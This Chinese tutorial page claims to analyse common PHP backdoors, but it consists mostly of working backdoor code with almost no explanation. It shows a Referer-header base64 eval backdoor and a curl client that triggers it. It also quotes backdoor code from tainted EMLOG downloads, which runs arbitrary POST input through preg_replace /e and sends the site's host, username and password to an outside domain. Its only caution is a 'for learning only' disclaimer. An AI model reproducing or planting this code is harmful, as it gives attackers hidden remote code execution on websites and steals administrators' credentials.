手机
当前位置:查字典教程网 > >脚本攻防 >一些常见的PHP后门原理分析
一些常见的PHP后门原理分析
摘要:本地测试结果如下图。本程序只作为学习作用,请勿拿去做坏事。复制代码代码如下:

本地测试结果如下图。

本程序只作为学习作用,请勿拿去做坏事。

复制代码代码如下:

<?php

//1.php

header('Content-type:text/html;charset=utf-8');

parse_str($_SERVER['HTTP_REFERER'], $a);

if(reset($a) == '10' && count($a) == 9) {

eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));

}<?php

//2.php

header('Content-type:text/html;charset=utf-8');

//要执行的代码

$code = <<<CODE

phpinfo();

CODE;

//进行base64编码

$code = base64_encode($code);

//构造referer字符串

$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

//后门url

$url = 'http://localhost/test1/1.php';

$ch = curl_init();

$options = array(

CURLOPT_URL => $url,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array($ch, $options);

echo curl_exec($ch);

一些常见的PHP后门原理分析1

最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码

复制代码代码如下:

if (isset($_GET["rsdsrv"])) {

if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){

@preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");

}

}

file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));

【一些常见的PHP后门原理分析】相关文章:

PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

常用的一些注入命令 方便一下大家

脚本入侵 ASP网站入侵常用的一些技巧分享

利用星外虚拟机的入侵 经验分析

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

Ecshop后台拿shell方法总结

mysql的user.MYD数据库连接密码hash值无法用winhex打开等

SQL注入攻防入门详解 [图文并茂] 附示例下载

脚本入侵 入侵ewebeditor编辑器一些技巧

详解如何通过“鼠洞”控制电脑

精品推荐
分类导航